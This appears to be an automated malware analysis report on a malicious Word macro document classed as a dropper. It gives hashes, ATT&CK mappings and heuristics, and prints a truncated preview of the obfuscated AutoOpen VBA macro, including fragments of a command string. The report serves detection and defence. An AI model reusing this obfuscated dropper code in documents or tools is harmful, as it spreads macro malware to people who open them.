Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 73d69d9e780db52b…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 114.9 KB
Created: 2018-09-26 07:23:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 12ff900aabd2150fcf2e572f072603d3
SHA-1: a93c26c4e212cc1cb115dd97ff5a78d6244fc169
SHA-256: 73d69d9e780db52b9f9725390ab0c60c89d23ba301cb03e26cd9a20f749f0487
Risk Score: 202

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a VBA macro. The macro includes a Shell() call, which is a critical finding, indicating an attempt to execute arbitrary commands. The presence of the 'AutoOpen' macro and the ClamAV detection name 'Doc.Dropper.Agent-6911940-0' strongly suggest this document is designed to drop and execute a secondary payload. No specific family could be identified, but the technique is consistent with a macro-based downloader.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6911940-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6911940-0
  • VBA macros detected [medium; 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 64790 bytes
SHA-256: f99e35019bdccc06c491f33d774415609ca1b73e4380b5fe8589f0a21793720c

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ochBFSTcDoJZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim zHXiM(1)
zHXiM(0) = Right(dzoFMjA + dHdpwvYkpjRRunUAja + nkDBcvra, 884) + Mid(QFOqWDd + XhRLFVAYzNwGLquCdtPpEp + qzwzDb, 462, 472)
   Dim kXrjbB(2)
kXrjbB(0) = MidB(GmLfqVI + oAQJvMVUwCGMZRGXK + PktIwu, 324, 673) + Right(ETAbb + piNHDWiuDFZOlWpWQmkRElE + tujww, 348) + MidB(HKLNOOF + JfaidqvECFMIfdAzWHcw + iLYSBXfa, 876, 533) + Right(TPQqDr + UwoNilOUDjiWRRdDiZlP + OJkjjE, 713)
kXrjbB(1) = Mid(VjXLjPJ + puqtbwYZolCtoTbdan + CvWMuFtn, 399, 45) + Right(ziUiQi + wuYnzdXnjzSqzFIESjAQA + uGwtN, 852)
   Dim WjdqAw(1)
WjdqAw(0) = MidB(DPbFJ + bWMaXGHaMzviNjLfPA + hFuSC, 329, 364) + Right(WpwtSS + PZCdBlEpBufEZMfVd + qHzkY, 776)
   Dim AdwIRE(1)
AdwIRE(0) = MidB(uCvjNCc + RPIHSUzIWCiXGQwLuSuAifnb + ikUwWY, 249, 790) + MidB(IAzWinH + ihBNnUjXZbitZthjAiDJb + tTYSvXQ, 611, 872)
   Dim mOlZn(2)
mOlZn(0) = MidB(ZCBvuVkE + bhqhHYNpJbHXvVXpB + jfYcu, 66, 21) + Left(VhXaFIq + TLzMYSitzzNPmFRzfiOMB + ZzjBn, 610) + MidB(hzMXHGzA + oYFvSHzjzKwoStfNoM + PFFFaD, 59, 668) + MidB(LMwzi + upwtpcPioMRoVDqpM + tdQjEnj, 810, 353)
mOlZn(1) = Left(puWUbacE + OqQrbWquoUUNwIYNfsWz + iSAcQMIO, 785) + Mid(zpcRtvIa + hZzwREJzstztwEtbLFYS + TvvmzNW, 810, 548)
   Dim QWZjh(1)
QWZjh(0) = Left(wkIDQztL + wiwSoLwKMKsbHvKkNSq + ouwurMN, 554) + Left(vjkwb + hXSlFHbIDivHAMit + Hzzhja, 98) + MidB(ziZCkT + jloSiJiBGnjYShwqSEZiCil + CPKon, 285, 900) + Left(BYnUjmU + whAcMsttJDwFiwivz + XZVoC, 742)
WhFmibfSkzrCz (KeyString(vHuSLuzf + XlbIaVFI + 17 + 14 + 36 + VbHKb + JUinl) + zviaD + JUTSM + KeyString(cFSQMFVT + qvrpKaH + 19 + 16 + 42 + YJfniEzH + orPuO) + KlVXQ + AbGUBWd + swhtwGVXiPC + wpbRj + HnfbAzb + NAZAbAjj + NNPYS)
   Dim ivFzd(1)
ivFzd(0) = MidB(NIazC + fWGmGarSqzZzifUGXDXZ + oYjISH, 332, 27) + Right(RLwzw + dOBEVfUaivzRHzXXoizif + SaWhUJ, 539)
   Dim lXjnzh(1)
lXjnzh(0) = Left(judQd + UGhtEfdYwSTuqajhDkoHQTa + FCPZMQtI, 828) + Right(LHwApfN + JKzQvtjzQadSiisHdw + HTWvmnRk, 111)
End Sub


Attribute VB_Name = "KhKTsOhXdVDIzU"
Function KlVXQ()
iOozbbjQa = "d \/  /\/\/   \/\ /" + "V:ON/C" + """" + "set" + " `\];=20a7 02a7 70a2"
Dim bbPrK(2)
bbPrK(0) = Mid(WYKOwzIT + iQmuwzQrNupRLprIomaH + zQDmv, 939, 192) + Mid(DXvQddWa + AhHzYjRLilDIXhpiwQ + UHSDwOi, 350, 239)
bbPrK(1) = MidB(PZqRioLf + KzOYdcjvXvPznrmChQZwMH + PKqkk, 735, 156) + MidB(DiTmh + jBzZDZuYcRIlQQRjV + KdrdjDP, 374, 325) + MidB(INLInHq + MHVzYFBNUAPLwiZpUiE + dcpqId, 183, 810) + Right(aDHsE + BQwzPQVlFiBSREVwPLEaL + CVnPpVL, 358)
   Dim PROiYU(2)
PROiYU(0) = Left(boPrTH + HOqwqkiuviWPMqSfnGRrqh + VRKCfLS, 274) + Right(jwibjkd + IPwPDbQQpXoBURjs + zwtXH, 389) + Left(ahNEj + WBGBDvYYcRKPAkjq + EswjaE, 800) + Left(vjujz + rzPvZVvKXELhcUpRJKVd + QOhiP, 947)
PROiYU(1) = Right(XtkbPrjw + DAiahaLcjGTWVZHOHuZ + KjkOU, 231) + Right(DwZph + GoEUdtEOBfjcidFSQzqf + zuPXwj, 28)
   Dim UtWQs(2)
UtWQs(0) = Right(nSTSNjBZ + PtCaqkVwDLszVoNJVn + ZCiYum, 832) + Left(BvDCL + dWqlZivVwrunPYjtXHLYjFw + CcTKvQjz, 934)
UtWQs(1) = Right(rHNlwuwQ + OKiiVpRHfaaESLdXiZjIamQ + aoIiTOn, 350) + MidB(abOApFW + uaUMzFCiBEwEuTWsGpf + GYwUYuDD, 413, 256) + MidB(FbLpO + QkfVjcViiKNjGYwkij + arvrS, 840, 222) + MidB(iWbDbDPw + VZLzkSUmsdhYEiljJiW + isFdfV, 640, 770)
zjArrbkHkD = " 720a 2a07" + " 7a20 20a7 270a" + " 70a2 72a0 a072 a"
Dim sacGaP(2)
sacGaP(0) = Left(SKzRtzAW + LFhouZumBcIjdvWUZVN + nMQmCzAv, 690) + Left(GPDfCMZ + LKiRfPDinQzmhJHwmAjY + jOsrRNvj, 546) + Left(iwHnvWu + oThCztEqpimsVwmjZUO + XAKAKrim, 523) + MidB(NhptY + snJrpdnkjKWImizjEQ + sLlMk, 357, 412)
sacGaP(1) = MidB(RAVXl + jqWGvEwiFuLwDtcQf + YUOqzF, 173, 98) + MidB(wmCNt + QGmifXwWMwbAGQRCr + wpdTsMJ, 726, 819) + Left(MAZRl + EtcsMdqhjmvrBKoHLiznk + bhUboiY, 98) + MidB(zGczd + cwuSzCRUkhSrWaCI + sIXmNz, 771, 35)
   Dim iThKl(2)
iThKl(0) = Mid(bfHKTt + jFIjCzUtkqXflCYiwzZv + HadFLZOj, 996, 648) + Right(RSEOVoa + nqdjuLrnGJCXrs
... (truncated)